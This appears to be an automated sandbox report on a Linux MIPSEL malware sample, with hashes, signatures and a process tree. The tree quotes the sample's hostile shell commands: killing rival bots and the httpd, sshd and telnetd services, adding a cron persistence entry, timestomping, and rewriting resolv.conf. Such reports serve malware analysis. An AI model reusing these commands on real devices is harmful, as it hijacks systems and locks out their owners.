Analysis
max time kernel: 0s
max time network: 120s
platform: linux_mipsel
resource: debian9-mipsel-en-20211208
submitted: 15-04-2022 01:07
Static task: static1
Behavioral task: behavioral1
Sample: 728afe738dc2f1a8ae88633d62b43cde27835296400a60c8ba2b409440ccd848
Resource: debian9-mipsel-en-20211208
General
Target: 728afe738dc2f1a8ae88633d62b43cde27835296400a60c8ba2b409440ccd848
Size: 126KB
MD5: 524f9d251746b069977fd621b2c5fd8f
SHA1: 6932744f2893c0b1748a3dacc480f669d971af17
SHA256: 728afe738dc2f1a8ae88633d62b43cde27835296400a60c8ba2b409440ccd848
SHA512: 71ae3066f2fb5bef87a2d0544abe8a5eeecdea6f15a7e39a0324bfbf4e0ff286206b63d89a32115af201272625f1748190cd376a5b5d345e41272d47458e4ea6
Malware Config
Signatures
Writes file to system bin folder 1 TTPs 5 IoCs
Processes: 728afe738dc2f1a8ae88633d62b43cde27835296400a60c8ba2b409440ccd848
description | ioc | process
/bin/nvram | /bin/nvram | 728afe738dc2f1a8ae88633d62b43cde27835296400a60c8ba2b409440ccd848
/bin/cfgmtd | /bin/cfgmtd | 728afe738dc2f1a8ae88633d62b43cde27835296400a60c8ba2b409440ccd848
/sbin/sncfg | /sbin/sncfg | 728afe738dc2f1a8ae88633d62b43cde27835296400a60c8ba2b409440ccd848
/bin/crontab | /bin/crontab | 728afe738dc2f1a8ae88633d62b43cde27835296400a60c8ba2b409440ccd848
/bin/uname | /bin/uname | 728afe738dc2f1a8ae88633d62b43cde27835296400a60c8ba2b409440ccd848
Writes DNS configuration 1 TTPs 1 IoCs
Writes data to DNS resolver config file.
Processes: 728afe738dc2f1a8ae88633d62b43cde27835296400a60c8ba2b409440ccd848
description | ioc | process
/etc/init.d/rcS | /etc/init.d/rcS | 728afe738dc2f1a8ae88633d62b43cde27835296400a60c8ba2b409440ccd848
Modifies rc script 1 TTPs 1 IoCs
Adding/modifying system rc scripts is a common persistence mechanism.
Processes: 728afe738dc2f1a8ae88633d62b43cde27835296400a60c8ba2b409440ccd848
description | ioc | process
/etc/rc.d/rc.local | /etc/rc.d/rc.local | 728afe738dc2f1a8ae88633d62b43cde27835296400a60c8ba2b409440ccd848
Write file to user bin folder 1 TTPs 6 IoCs
Processes: 728afe738dc2f1a8ae88633d62b43cde27835296400a60c8ba2b409440ccd848, service, service, service
description | ioc | process
/usr/sbin/nvram | /usr/sbin/nvram | 728afe738dc2f1a8ae88633d62b43cde27835296400a60c8ba2b409440ccd848
/usr/bin/compile_time | /usr/bin/compile_time | 728afe738dc2f1a8ae88633d62b43cde27835296400a60c8ba2b409440ccd848
/usr/bin/crontab | /usr/bin/crontab | 728afe738dc2f1a8ae88633d62b43cde27835296400a60c8ba2b409440ccd848
/usr/sbin/service | /usr/sbin/service | service
/usr/sbin/service | /usr/sbin/service | service
/usr/sbin/service | /usr/sbin/service | service
Enumerates kernel/hardware configuration 1 TTPs 45 IoCs
Reads contents of /sys virtual filesystem to enumerate system information.
Processes: systemctl
description | ioc | process
/sys/fs/kdbus/0-system/bus | /sys/fs/kdbus/0-system/bus | systemctl
Reads runtime system information 64 IoCs
Reads data from /proc virtual filesystem.
Processes: systemctl, 728afe738dc2f1a8ae88633d62b43cde27835296400a60c8ba2b409440ccd848, crontab
description | ioc | process
/proc/filesystems | /proc/filesystems | systemctl
/proc/1/environ | /proc/1/environ | systemctl
/proc/self/stat | /proc/self/stat | systemctl
/proc/cmdline | /proc/cmdline | systemctl
/proc/321/cmdline | /proc/321/cmdline | 728afe738dc2f1a8ae88633d62b43cde27835296400a60c8ba2b409440ccd848
/proc/filesystems | /proc/filesystems | crontab
Writes file to tmp directory 11 IoCs
Malware often drops required files in the /tmp directory.
Processes: rm, cat, 728afe738dc2f1a8ae88633d62b43cde27835296400a60c8ba2b409440ccd848
description | ioc | process
/tmp/tty3 | /tmp/tty3 | rm
/tmp/tty4 | /tmp/tty4 | rm
/tmp/tty6 | /tmp/tty6 | rm
/tmp/.xs | /tmp/.xs |
/tmp/.xs/*.pid | /tmp/.xs/*.pid | cat
/tmp/toexec | /tmp/toexec | 728afe738dc2f1a8ae88633d62b43cde27835296400a60c8ba2b409440ccd848
/tmp/728afe738dc2f1a8ae88633d62b43cde27835296400a60c8ba2b409440ccd848 | /tmp/728afe738dc2f1a8ae88633d62b43cde27835296400a60c8ba2b409440ccd848 | 728afe738dc2f1a8ae88633d62b43cde27835296400a60c8ba2b409440ccd848
/tmp/tty1 | /tmp/tty1 | rm
/tmp/tty2 | /tmp/tty2 | rm
/tmp/tty5 | /tmp/tty5 | rm
/tmp/.xs/* | /tmp/.xs/* | rm
Processes
./728afe738dc2f1a8ae88633d62b43cde27835296400a60c8ba2b409440ccd848: ./728afe738dc2f1a8ae88633d62b43cde27835296400a60c8ba2b409440ccd848 (1⤵ PID:327)
- Writes file to system bin folder
- Modifies init.d
- Modifies rc script
- Write file to user bin folder
- Reads runtime system information
- Writes file to tmp directory
/bin/sh: sh -c "rm -rf /var/run/wgsh > /dev/null 2>&1 &" (1⤵ PID:328)
/bin/rm: rm -rf /var/run/wgsh (2⤵ PID:329)
/bin/sh: sh -c "rm -rf /var/run/bbsh > /dev/null 2>&1 &" (1⤵ PID:330)
/bin/rm: rm -rf /var/run/bbsh (2⤵ PID:331)
/bin/sh: sh -c "rm -rf /var/run/tty1 > /dev/null 2>&1 &" (1⤵ PID:332)
/bin/rm: rm -rf /var/run/tty1 (2⤵ PID:333)
/bin/sh: sh -c "rm -rf /var/run/tty2 > /dev/null 2>&1 &" (1⤵ PID:335)
/bin/rm: rm -rf /var/run/tty2 (2⤵ PID:336)
/bin/sh: sh -c "rm -rf /var/run/tty3 > /dev/null 2>&1 &" (1⤵ PID:337)
/bin/rm: rm -rf /var/run/tty3 (2⤵ PID:341)
/bin/sh: sh -c "rm -rf /var/run/tty4 > /dev/null 2>&1 &" (1⤵ PID:342)
/bin/rm: rm -rf /var/run/tty4 (2⤵ PID:343)
/bin/sh: sh -c "rm -rf /var/run/tty5 > /dev/null 2>&1 &" (1⤵ PID:344)
/bin/rm: rm -rf /var/run/tty5 (2⤵ PID:345)
/bin/sh: sh -c "rm -rf /var/run/tty6 > /dev/null 2>&1 &" (1⤵ PID:346)
/bin/rm: rm -rf /var/run/tty6 (2⤵ PID:347)
/bin/sh: sh -c "rm -rf /tmp/tty1 > /dev/null 2>&1 &" (1⤵ PID:348)
/bin/rm: rm -rf /tmp/tty1 (2⤵ PID:349)
- Writes file to tmp directory
/bin/sh: sh -c "rm -rf /tmp/tty2 > /dev/null 2>&1 &" (1⤵ PID:350)
/bin/rm: rm -rf /tmp/tty2 (2⤵ PID:351)
- Writes file to tmp directory
/bin/sh: sh -c "rm -rf /tmp/tty3 > /dev/null 2>&1 &" (1⤵ PID:352)
/bin/rm: rm -rf /tmp/tty3 (2⤵ PID:353)
- Writes file to tmp directory
/bin/sh: sh -c "rm -rf /tmp/tty4 > /dev/null 2>&1 &" (1⤵ PID:354)
/bin/rm: rm -rf /tmp/tty4 (2⤵ PID:355)
- Writes file to tmp directory
/bin/sh: sh -c "rm -rf /tmp/tty5 > /dev/null 2>&1 &" (1⤵ PID:356)
/bin/rm: rm -rf /tmp/tty5 (2⤵ PID:357)
- Writes file to tmp directory
/bin/sh: sh -c "rm -rf /tmp/tty6 > /dev/null 2>&1 &" (1⤵ PID:358)
/bin/rm: rm -rf /tmp/tty6 (2⤵ PID:359)
- Writes file to tmp directory
/bin/sh: sh -c "rm -rf /var/run/pty > /dev/null 2>&1 &" (1⤵ PID:360)
/bin/rm: rm -rf /var/run/pty (2⤵ PID:361)
/bin/sh: sh -c "killall -9 arm > /dev/null 2>&1 &" (1⤵ PID:362)
/bin/sh: sh -c "killall -9 mips > /dev/null 2>&1 &" (1⤵ PID:364)
/bin/sh: sh -c "killall -9 mipsel > /dev/null 2>&1 &" (1⤵ PID:366)
/bin/sh: sh -c "killall -9 powerpc > /dev/null 2>&1 &" (1⤵ PID:368)
/bin/sh: sh -c "killall -9 ppc > /dev/null 2>&1 &" (1⤵ PID:370)
/bin/sh: sh -c "killall -9 daemon.armv4l.mod > /dev/null 2>&1 &" (1⤵ PID:372)
/bin/sh: sh -c "killall -9 daemon.i686.mod > /dev/null 2>&1 &" (1⤵ PID:374)
/bin/sh: sh -c "killall -9 daemon.mips.mod > /dev/null 2>&1 &" (1⤵ PID:376)
/bin/sh: sh -c "killall -9 daemon.mipsel.mod > /dev/null 2>&1 &" (1⤵ PID:378)
/bin/sh: sh -c "kill -9 `cat /tmp/.xs/*.pid` > /dev/null 2>&1 &" (1⤵ PID:380)
/bin/sh: sh -c "rm -rf /tmp/.xs/* > /dev/null 2>&1 &" (1⤵ PID:382)
/bin/rm: rm -rf "/tmp/.xs/*" (2⤵ PID:384)
- Writes file to tmp directory
/bin/cat: cat "/tmp/.xs/*.pid" (1⤵ PID:383)
- Writes file to tmp directory
/bin/sh: sh -c "sleep 432000 && reboot &" (1⤵ PID:385)
/bin/sh: sh -c "echo \"nameserver 8.8.8.8\" > /etc/resolv.conf &" (1⤵ PID:387)
/bin/sleep: sleep 432000 (1⤵ PID:388)
/bin/sh: sh -c "chmod 700 /tmp/728afe738dc2f1a8ae88633d62b43cde27835296400a60c8ba2b409440ccd848 > /dev/null 2>&1 &" (1⤵ PID:390)
/bin/chmod: chmod 700 /tmp/728afe738dc2f1a8ae88633d62b43cde27835296400a60c8ba2b409440ccd848 (2⤵ PID:391)
/bin/sh: sh -c "touch -acmr /bin/ls /tmp/728afe738dc2f1a8ae88633d62b43cde27835296400a60c8ba2b409440ccd848" (1⤵ PID:392)
/usr/bin/touch: touch -acmr /bin/ls /tmp/728afe738dc2f1a8ae88633d62b43cde27835296400a60c8ba2b409440ccd848 (2⤵ PID:393)
/bin/sh: sh -c "(crontab -l | grep -v \"/tmp/728afe738dc2f1a8ae88633d62b43cde27835296400a60c8ba2b409440ccd848\" | grep -v \"no cron\" | grep -v \"lesshts/run.sh\" > /var/run/.x001804289383) > /dev/null 2>&1" (1⤵ PID:394)
/bin/grep: grep -v "no cron" (1⤵ PID:398)
/bin/grep: grep -v /tmp/728afe738dc2f1a8ae88633d62b43cde27835296400a60c8ba2b409440ccd848 (1⤵ PID:397)
/usr/bin/crontab: crontab -l (1⤵ PID:396)
- Reads runtime system information
/bin/grep: grep -v lesshts/run.sh (1⤵ PID:399)
/bin/sh: sh -c "echo \"* * * * * /tmp/728afe738dc2f1a8ae88633d62b43cde27835296400a60c8ba2b409440ccd848 > /dev/null 2>&1 &\" >> /var/run/.x001804289383" (1⤵ PID:400)
/bin/sh: sh -c "crontab /var/run/.x001804289383" (1⤵ PID:401)
/usr/bin/crontab: crontab /var/run/.x001804289383 (2⤵ PID:402)
/bin/sh: sh -c "rm -rf /var/run/.x001804289383" (1⤵ PID:403)
/bin/rm: rm -rf /var/run/.x001804289383 (2⤵ PID:404)
/bin/sh: sh -c "/bin/uname -n" (1⤵ PID:405)
/bin/uname: /bin/uname -n (2⤵ PID:406)
/bin/sh: sh -c "/bin/uname -n" (1⤵ PID:407)
/bin/uname: /bin/uname -n (2⤵ PID:408)
/bin/sh: sh -c "kill -9 `cat /var/run/httpd.pid` > /dev/null 2>&1 &" (1⤵ PID:412)
/bin/sh: sh -c "service httpd stop > /dev/null 2>&1 &" (1⤵ PID:414)
/usr/sbin/service: service httpd stop (2⤵ PID:416)
- Write file to user bin folder
/usr/bin/basename: basename /usr/sbin/service (3⤵ PID:420)
/usr/bin/basename: basename /usr/sbin/service (3⤵ PID:423)
/bin/systemctl: systemctl --quiet is-active multi-user.target (3⤵ PID:428)
- Enumerates kernel/hardware configuration
- Reads runtime system information
/bin/systemctl: systemctl -p Triggers show dbus.socket (3⤵ PID:454)
- Enumerates kernel/hardware configuration
- Reads runtime system information
/bin/systemctl: systemctl -p Triggers show ssh.socket (3⤵ PID:461)
- Enumerates kernel/hardware configuration
- Reads runtime system information
/bin/systemctl: systemctl -p Triggers show syslog.socket (3⤵ PID:464)
- Enumerates kernel/hardware configuration
- Reads runtime system information
/bin/systemctl: systemctl -p Triggers show systemd-fsckd.socket (3⤵ PID:467)
- Enumerates kernel/hardware configuration
/bin/systemctl: systemctl -p Triggers show systemd-initctl.socket (3⤵ PID:470)
- Enumerates kernel/hardware configuration
- Reads runtime system information
/bin/systemctl: systemctl -p Triggers show systemd-journald-audit.socket (3⤵ PID:473)
- Enumerates kernel/hardware configuration
- Reads runtime system information
/bin/systemctl: systemctl -p Triggers show systemd-journald-dev-log.socket (3⤵ PID:476)
- Enumerates kernel/hardware configuration
- Reads runtime system information
/bin/systemctl: systemctl -p Triggers show systemd-journald.socket (3⤵ PID:479)
- Enumerates kernel/hardware configuration
- Reads runtime system information
/bin/systemctl: systemctl -p Triggers show systemd-networkd.socket (3⤵ PID:482)
- Enumerates kernel/hardware configuration
/bin/systemctl: systemctl -p Triggers show systemd-rfkill.socket (3⤵ PID:485)
- Enumerates kernel/hardware configuration
/bin/systemctl: systemctl -p Triggers show systemd-udevd-control.socket (3⤵ PID:490)
- Enumerates kernel/hardware configuration
- Reads runtime system information
/bin/systemctl: systemctl -p Triggers show systemd-udevd-kernel.socket (3⤵ PID:493)
- Enumerates kernel/hardware configuration
- Reads runtime system information
/usr/local/sbin/systemctl: systemctl stop httpd.service (2⤵ PID:416)
/usr/local/bin/systemctl: systemctl stop httpd.service (2⤵ PID:416)
/usr/sbin/systemctl: systemctl stop httpd.service (2⤵ PID:416)
/usr/bin/systemctl: systemctl stop httpd.service (2⤵ PID:416)
/sbin/systemctl: systemctl stop httpd.service (2⤵ PID:416)
/bin/systemctl: systemctl stop httpd.service (2⤵ PID:416)
- Enumerates kernel/hardware configuration
- Reads runtime system information
/bin/cat: cat /var/run/httpd.pid (1⤵ PID:415)
/bin/sh: sh -c "killall -9 mini_httpd > /dev/null 2>&1 &" (1⤵ PID:417)
/bin/sh: sh -c "killall -9 minihttpd > /dev/null 2>&1 &" (1⤵ PID:419)
/bin/sh: sh -c "kill -9 `cat /var/run/thttpd.pid` > /dev/null 2>&1 &" (1⤵ PID:422)
/bin/sh: sh -c "nvram set httpd_enable=0 > /dev/null 2>&1" (1⤵ PID:425)
/bin/cat: cat /var/run/thttpd.pid (1⤵ PID:426)
/bin/sh: sh -c "nvram set http_enable=0 > /dev/null 2>&1" (1⤵ PID:427)
/bin/sh: sh -c "killall -9 httpd > /dev/null 2>&1 &" (1⤵ PID:429)
/bin/sh: sh -c "service telnetd stop > /dev/null 2>&1 &" (1⤵ PID:431)
/usr/sbin/service: service telnetd stop (2⤵ PID:432)
- Write file to user bin folder
/usr/bin/basename: basename /usr/sbin/service (3⤵ PID:439)
/usr/bin/basename: basename /usr/sbin/service (3⤵ PID:443)
/bin/systemctl: systemctl --quiet is-active multi-user.target (3⤵ PID:449)
- Enumerates kernel/hardware configuration
- Reads runtime system information
/bin/systemctl: systemctl -p Triggers show dbus.socket (3⤵ PID:462)
- Enumerates kernel/hardware configuration
/bin/systemctl: systemctl -p Triggers show ssh.socket (3⤵ PID:465)
- Enumerates kernel/hardware configuration
- Reads runtime system information
/bin/systemctl: systemctl -p Triggers show syslog.socket (3⤵ PID:468)
- Enumerates kernel/hardware configuration
- Reads runtime system information
/bin/systemctl: systemctl -p Triggers show systemd-fsckd.socket (3⤵ PID:471)
- Enumerates kernel/hardware configuration
- Reads runtime system information
/bin/systemctl: systemctl -p Triggers show systemd-initctl.socket (3⤵ PID:474)
- Enumerates kernel/hardware configuration
- Reads runtime system information
/bin/systemctl: systemctl -p Triggers show systemd-journald-audit.socket (3⤵ PID:477)
- Enumerates kernel/hardware configuration
/bin/systemctl: systemctl -p Triggers show systemd-journald-dev-log.socket (3⤵ PID:480)
- Enumerates kernel/hardware configuration
- Reads runtime system information
/bin/systemctl: systemctl -p Triggers show systemd-journald.socket (3⤵ PID:483)
- Enumerates kernel/hardware configuration
- Reads runtime system information
/bin/systemctl: systemctl -p Triggers show systemd-networkd.socket (3⤵ PID:486)
- Enumerates kernel/hardware configuration
- Reads runtime system information
/bin/systemctl: systemctl -p Triggers show systemd-rfkill.socket (3⤵ PID:488)
- Enumerates kernel/hardware configuration
- Reads runtime system information
/bin/systemctl: systemctl -p Triggers show systemd-udevd-control.socket (3⤵ PID:491)
- Enumerates kernel/hardware configuration
- Reads runtime system information
/bin/systemctl: systemctl -p Triggers show systemd-udevd-kernel.socket (3⤵ PID:495)
- Enumerates kernel/hardware configuration
- Reads runtime system information
/usr/local/sbin/systemctl: systemctl stop telnetd.service (2⤵ PID:432)
/usr/local/bin/systemctl: systemctl stop telnetd.service (2⤵ PID:432)
/usr/sbin/systemctl: systemctl stop telnetd.service (2⤵ PID:432)
/usr/bin/systemctl: systemctl stop telnetd.service (2⤵ PID:432)
/sbin/systemctl: systemctl stop telnetd.service (2⤵ PID:432)
/bin/systemctl: systemctl stop telnetd.service (2⤵ PID:432)
- Enumerates kernel/hardware configuration
/bin/sh: sh -c "service sshd stop > /dev/null 2>&1 &" (1⤵ PID:433)
/usr/sbin/service: service sshd stop (2⤵ PID:437)
- Write file to user bin folder
/usr/bin/basename: basename /usr/sbin/service (3⤵ PID:442)
/usr/bin/basename: basename /usr/sbin/service (3⤵ PID:446)
/bin/systemctl: systemctl --quiet is-active multi-user.target (3⤵ PID:450)
- Enumerates kernel/hardware configuration
- Reads runtime system information
/bin/systemctl: systemctl -p Triggers show dbus.socket (3⤵ PID:463)
- Enumerates kernel/hardware configuration
/bin/systemctl: systemctl -p Triggers show ssh.socket (3⤵ PID:466)
- Enumerates kernel/hardware configuration
- Reads runtime system information
/bin/systemctl: systemctl -p Triggers show syslog.socket (3⤵ PID:469)
- Enumerates kernel/hardware configuration
- Reads runtime system information
/bin/systemctl: systemctl -p Triggers show systemd-fsckd.socket (3⤵ PID:472)
- Enumerates kernel/hardware configuration
- Reads runtime system information
/bin/systemctl: systemctl -p Triggers show systemd-initctl.socket (3⤵ PID:475)
- Enumerates kernel/hardware configuration
- Reads runtime system information
/bin/systemctl: systemctl -p Triggers show systemd-journald-audit.socket (3⤵ PID:478)
- Enumerates kernel/hardware configuration
- Reads runtime system information
/bin/systemctl: systemctl -p Triggers show systemd-journald-dev-log.socket (3⤵ PID:481)
- Enumerates kernel/hardware configuration
- Reads runtime system information
/bin/systemctl: systemctl -p Triggers show systemd-journald.socket (3⤵ PID:484)
- Enumerates kernel/hardware configuration
- Reads runtime system information
/bin/systemctl: systemctl -p Triggers show systemd-networkd.socket (3⤵ PID:487)
- Enumerates kernel/hardware configuration
- Reads runtime system information
/bin/systemctl: systemctl -p Triggers show systemd-rfkill.socket (3⤵ PID:489)
- Enumerates kernel/hardware configuration
- Reads runtime system information
/bin/systemctl: systemctl -p Triggers show systemd-udevd-control.socket (3⤵ PID:492)
- Enumerates kernel/hardware configuration
- Reads runtime system information
/bin/systemctl: systemctl -p Triggers show systemd-udevd-kernel.socket (3⤵ PID:494)
- Enumerates kernel/hardware configuration
- Reads runtime system information
/usr/local/sbin/systemctl: systemctl stop sshd.service (2⤵ PID:437)
/usr/local/bin/systemctl: systemctl stop sshd.service (2⤵ PID:437)
/usr/sbin/systemctl: systemctl stop sshd.service (2⤵ PID:437)
/usr/bin/systemctl: systemctl stop sshd.service (2⤵ PID:437)
/sbin/systemctl: systemctl stop sshd.service (2⤵ PID:437)
/bin/systemctl: systemctl stop sshd.service (2⤵ PID:437)
- Enumerates kernel/hardware configuration
- Reads runtime system information
/bin/systemctl: systemctl list-unit-files --full "--type=socket" (1⤵ PID:435)
- Enumerates kernel/hardware configuration
/bin/sed: sed -ne "s/\\.socket\\s*[a-z]*\\s*\$/.socket/p" (1⤵ PID:436)
/bin/sh: sh -c "killall -9 telnetd > /dev/null 2>&1 &" (1⤵ PID:438)
/bin/sh: sh -c "killall -9 utelnetd > /dev/null 2>&1 &" (1⤵ PID:441)
/bin/sh: sh -c "killall -9 dropbear > /dev/null 2>&1 &" (1⤵ PID:445)
/bin/sh: sh -c "killall -9 sshd > /dev/null 2>&1 &" (1⤵ PID:448)
/bin/sh: sh -c "killall -9 lighttpd > /dev/null 2>&1 &" (1⤵ PID:452)
/bin/systemctl: systemctl list-unit-files --full "--type=socket" (1⤵ PID:456)
- Enumerates kernel/hardware configuration
- Reads runtime system information
/bin/systemctl: systemctl list-unit-files --full "--type=socket" (1⤵ PID:458)
- Enumerates kernel/hardware configuration
- Reads runtime system information
/bin/sed: sed -ne "s/\\.socket\\s*[a-z]*\\s*\$/.socket/p" (1⤵ PID:459)
/bin/sed: sed -ne "s/\\.socket\\s*[a-z]*\\s*\$/.socket/p" (1⤵ PID:460)